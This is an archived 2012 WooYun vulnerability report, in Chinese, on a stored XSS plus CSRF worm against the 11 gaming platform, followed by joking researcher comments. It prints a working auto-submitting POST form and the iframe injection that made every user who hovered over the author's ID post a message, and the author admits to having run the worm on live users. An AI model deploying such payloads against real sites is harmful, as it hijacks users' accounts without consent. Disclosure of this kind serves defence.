当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010294

漏洞标题:11平台持久型XSS配合CSRF造成强力蠕虫攻击!目前平台的妹子都在@我!

相关厂商:上海奕奕数字技术有限公司

漏洞作者: YunDay

提交时间:2012-07-29 13:23

修复时间:2012-09-12 13:24

公开时间:2012-09-12 13:24

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

11平台一处很犀利持久型XSS配合CSRF可造成强力蠕虫攻击!
目前全平台的妹子都在@我!
严正申明,仅作测试,截止漏洞发出时间我已经停止蠕虫测试,谢绝请喝茶!
PS:帮我把11天梯积分搞到3000就可以了

详细说明:

11平台一处个人信息没过滤。导致用户鼠标滑过我的ID就会触发,这个xss再配合发吆喝的csrf可导致蠕虫攻击!

漏洞证明:

1.持久型xss:
个人设置--个人介绍


鼠标滑过我ID的时候就可以触发该xss:


2.CSRF:
发送"吆喝"处存在csrf漏洞
3两者配合制造蠕虫:
在我的服务器上放置改post表单http://xxxxx.sinaapp.com/xxx.html

<html>
<head>
<title>test</title>
</head>
<form accept-charset="utf-8" onsubmit="document.charset='utf-8';document.getElementById('intro').value = decodeURIComponent(document.getElementById('intro').value);" name="form" method="post" action="http://i.5211game.com/request/" target="_self" >
<input name="method" type="text" value="publish">
<input name="tag" type="text" value="">
<input name="pic" type="text" value="">
<input name="content" value="hello_world!@sweetmygirl@sweetmygirl@sweetmygirl@sweetmygirl@sweetgirlmm@sweetgirlmm@sweetgirlmm@sweetgirlmm">
<input name="tx" type="text" value="0">
<input name="sina" type="text" value="0">
<input name="lastId" type="text" value="2522856">
<input name="oldId" type="text" value="2514419">
<input name="lasttime" type="text" value="1343530565579">
<input name="tp" type="text" value="phrase">
<input name="submit" type="image" src="http://goderci-wordpress.stor.sinaapp.com/uploads/2012/07/LOGO-300x220.png" value="11111" onclick="submit()"/>
</form>
<script type="text/javascript">
document.form.submit();
</script>
</html>


然后将该http://xxxxx.sinaapp.com/xxx.html使用iframe放在个人介绍里面

<iframe src=http://xxxxx.sinaapp.com/xxx.html></iframe>


该post表单自动提交,用户只要滑过我的ID就自动发送一个@sweetmygirl的吆喝


效果:


修复方案:

过滤xss
CSRF加token校验

版权声明:转载请注明来源 YunDay@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2012-07-29 13:24 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    洞主多少级了?

  2. 2012-07-29 13:26 | YunDay ( 路人 | Rank:30 漏洞数:4 | http://www.yunday.org)

    @xsser 我只求11不搞我

  3. 2012-07-29 13:26 | P1n9y_fly ( 实习白帽子 | Rank:97 漏洞数:11 | ضصششسسزرذخكللممنيئؤؤ...)

    @YunDay 目测将被跨省= =

  4. 2012-07-29 13:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    目前全平台的妹子都在@我! 真好

  5. 2012-07-29 13:57 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @xsser ...淡定淡定

  6. 2012-07-29 14:26 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    哈哈,笑死了。

  7. 2012-07-29 15:03 | YunDay ( 路人 | Rank:30 漏洞数:4 | http://www.yunday.org)

    我靠,反应好快啊,就修复了

  8. 2012-07-29 18:14 | 小一 ( 实习白帽子 | Rank:32 漏洞数:13 )

    不刀的人路过。。。

  9. 2012-07-30 22:03 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    楼主拿了3000后输盘给我行不?

  10. 2012-07-30 22:09 | YunDay ( 路人 | Rank:30 漏洞数:4 | http://www.yunday.org)

    @erevus 你匹配不到我的

  11. 2012-07-30 22:15 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    ...你让对面的邀请我把..

  12. 2012-08-11 14:32 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    天梯~~~~

  13. 2012-08-24 11:50 | 九零 ( 路人 | Rank:5 漏洞数:1 | http://www.90blog.org)

    3000天梯分。。。大神啊~~